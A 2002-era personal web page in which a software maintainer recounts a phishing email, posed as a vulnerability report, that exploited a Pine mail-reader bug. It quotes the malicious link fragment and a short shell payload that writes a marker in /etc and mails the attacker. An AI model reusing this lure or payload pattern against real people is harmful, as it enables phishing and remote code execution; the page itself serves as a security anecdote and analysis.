David Skoll Bio    Free Software    Articles & Presentations    Signatures & Privacy    Careers   
Home > About > Articles

Fifth Entry

The fifth entry in my challenge to infect my Linux desktop machine is a very worthy contender. It could have succeeded. Here's how the e-mail appeared in my text-mode mail reader:

Date: Tue, 15 Jan 2002 18:43:28 -0500
From: Jody McIntyre
To: dfs@roaringpenguin.com
Subject: Severe vulnerability found in rp-pppoe

I recently discovered a buffer overflow in rp-pppoe v3.3 that allows a
local root compromise if pppoe is running. A detailed description of the
problem can be found at my website. I will not be publicising the
vulnerability until you have a chance to fix the problem.


This was an amazing piece of social engineering, and I almost fell for it. I maintain the rp-pppoe package, and of course would be very concerned about a local root compromise. I was suspicious, however, because rp-pppoe is not installed set-uid, so I could not see how a local root compromise would be possible. So I got my mail program to show me all the headers in the message, and it also shows all HTML code (if any). Here's a snippet of the expanded message (I have wrapped lines for readability):

A detailed description of the problem can be found at my
<a href="http://www.modernduck.com/jodym/rp-pppoe/rp-pppoe-vuln.html'&

Well, the URL for the "website" link looks somewhat suspicious. In fact, it exloits a bug in Pine 4.43, and the sender may have known that I use the Pine mailer. However, I upgraded to Pine 4.44, which is not susceptible to this particular bug. However, if I had clicked on the link in Pine 4.43 or earlier, the following code would have been downloaded and run:

touch /etc/VIRUS-WAS-HERE &>/dev/null
echo | mail -s "I GET THE PRIZE" -c postmaster@roaringpenguin.com dfs@roaringpenguin.com
# Yeah, the touch won't work if you aren't running pine as root.  If I was
# more malicious (and had more time) I could go out and patch the install
# target of all the Makefiles on your system (for example) to run the above
# commands, instead of doing it here.  So I guess this is more of a proof of
# concept than a serious contender for the prize.  I hope you don't mind my
# attempt to notify myself:
echo | mail -s "w00t" <deleted_for_privacy_reasons>

This entry is the closest one yet, and I may yet have to pay up. However, although the entry was very well crafted to attack me in particular, I do not think it would propagate well. I do not use Pine's address book, so a virus would have to use other means to find out my friend's names for propagation purposes. And very few of the people I correspond with run Pine, so propagation would have been stopped by software diversity.

Back to Entry 4   But seriously...

David F. Skoll

  Copyright © 2004 Roaring Penguin Software Inc.         Legal Notices